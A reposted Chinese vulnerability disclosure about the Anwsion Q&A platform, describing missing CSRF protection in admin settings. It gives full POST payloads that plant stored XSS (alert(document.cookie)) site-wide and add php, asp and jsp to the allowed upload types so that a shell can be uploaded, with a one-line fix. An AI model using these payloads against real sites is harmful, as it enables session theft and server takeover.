网站地图    收藏   

主页 > 后端 > 网站安全 >

anwsion后台一个设置缺陷及修复 - 网站安全 - 自学

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] 程序在后台设置没有HASH来限制CSRF的防御,故导致一些可能出现的危害http://127.0.0.1:8080/wenda/?/admin/setting/sys_save_ajax/site_announce=scriptalert(document.cookie)/scripturl_rewrite_enable=N......

程序在后台设置没有HASH来限制CSRF的防御,故导致一些可能出现的危害
 
 
 
http://127.0.0.1:8080/wenda/?/admin/setting/sys_save_ajax/
 
 
site_announce=<script>alert(document.cookie)</script>&url_rewrite_enable=N&request_route=1&request_route_custom=%2Fhome%2Fexplore%2F%3D%3D%3D%2Fexplore%2F%0A%2Fhome%2Fexplore%2Fguest%3D%3D%3D%2Fguest%0A%2Fhome%2Fexplore%2Fcategory-(%3Anum)%3D%3D%3D%2Fcategory%2F(%3Anum)%0A%2Fpeople%2Flist%2F%3D%3D%3D%2Fusers%2F%0A%2Faccount%2Flogin%2F%3D%3D%3D%2Flogin%2F%0A%2Faccount%2Flogout%2F%3D%3D%3D%2Flogout%2F%0A%2Faccount%2Fsetting%2F(%3Aany)%2F%3D%3D%3D%2Fsetting%2F(%3Aany)%2F&online_count_open=Y&online_interval=15&unread_flush_interval=100&auto_question_lock_day=30&statistic_code=%3Cscript%3Ealert(1)%3C%2Fscript%3E&report_reason=%E5%B9%BF%E5%91%8A%2FSPAM%0A%E6%81%B6%E6%84%8F%E7%81%8C%E6%B0%B4%0A%E8%BF%9D%E8%A7%84%E5%86%85%E5%AE%B9%0A%E6%96%87%E4%B8%8D%E5%AF%B9%E9%A2%98%0A%E9%87%8D%E5%A4%8D%E5%8F%91%E9%97%AE&report_message_uid=1&time_style=Y&admin_login_seccode=Y&_post_type=ajax
 
site_announce参数对应的是:站点功能->网站公告:(支持HTML)
 
statistic_code参数对应的是:站点功能->网站统计代码
 
其他参数默认即可。
 
 
http://127.0.0.1:8080/wenda/?/admin/setting/type-content
 
内容设置里面可以设置上传文件名的后缀,更加危险!!!
 
 
quick_publish=Y&upload_enable=Y&allowed_upload_types=jpg%2Cjpeg%2Cpng%2Cgif%2Czip%2Cdoc%2Cdocx%2Crar%2Cpdf%2Cpsd%2Cphp%2Casp%2Caspx%2Cjsp&upload_size_limit=512&answer_length_lower=2&question_title_limit=100&comment_limit=0&topic_title_limit=12&upload_avatar_size_limit=512&answer_edit_time=30&uninterested_fold=5&best_answer_day=30&best_answer_min_count=3&best_agree_min_count=3&related_question_keyword_count=&_post_type=ajax
 
 
allowed_upload_types=jpg%2Cjpeg%2Cpng%2Cgif%2Czip%2Cdoc%2Cdocx%2Crar%2Cpdf%2Cpsd%2Cphp%2Casp%2Caspx%2Cjsp懂的。。。 
 
 
 
首页会中XSS,中所有用户。
 

 
 
 
用户可以直接拿Shell.
 
修复方案:

加上hash。 
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论